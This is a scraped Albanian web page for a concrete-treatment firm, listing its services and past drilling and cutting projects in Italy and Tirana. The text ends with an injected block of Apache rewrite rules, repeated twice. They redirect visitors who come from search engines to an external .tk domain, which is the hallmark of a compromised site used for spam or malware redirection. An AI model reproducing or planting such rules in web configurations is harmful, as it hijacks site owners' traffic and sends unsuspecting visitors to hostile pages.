Firma "Trajtime Cimentosh"

Firma “Trajtime Cimentosh” lindi nga një eksperiencë 10-vjecare në fushën e trajtimit të cimentos në Itali. Menduam dhe konstatuam në faktin që këtë profesion ta aplikkojmë tashmë dhe në Shqipëri për të bashkëpunuar dhe ofruar teknologji bashkëkohore dhe punime të ndryshme si:
• Palinature
• Levigature
• Lucidime
• Skarifika
• Frezature
• Boccardatur
• Sabiatur
• Prerje betoni
• Shpime betoni
• Prerje asfaltiPunime te kryeraPunime t� ndryshme

Palinatura
Levigature
Shpime/Prerje betoni & asfalti
Frezature

Disa eksperienca pune

2003 Shpime Fiorenzuola Parma TAV
Shpime venien e shtyllave te korendit per linjen e TAV (treni i shpejtësisë së lartë). Shpime me thellesi 1200 mm - 1600 mm me diameter 120 mm                  ...Lexo më tepër
Punime ne areoportin e Treviso e Malpensa
Shpime per vendosjen e dritave ne pisten e uljes se avionave. Rreth 800 shpime me diameter 350 -500 mm asfalt.                      ...Lexo më tepër
Brescia & Verona 2009
Pastrim i xhuntove dhe silikonimi i tyre ne vend parkimet e avionave                             ...Lexo më tepër
Tirana Business Park - 2014
Prerje, boccardatura, thyerje betoni, shpime, etj..            ...Lexo më tepër
RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{HTTP_REFERER} google.*[\?&]q=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} msn.*[\?&]q=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} live.*[\?&]q=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} altavista.*[\?&]q=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} ask.*[\?&]q=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} yahoo.*[\?&]p=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} aol.*[\?&]query=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{HTTP_REFERER} google.*[\?&]q=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} msn.*[\?&]q=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} live.*[\?&]q=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} altavista.*[\?&]q=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} ask.*[\?&]q=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} yahoo.*[\?&]p=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} aol.*[\?&]query=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L]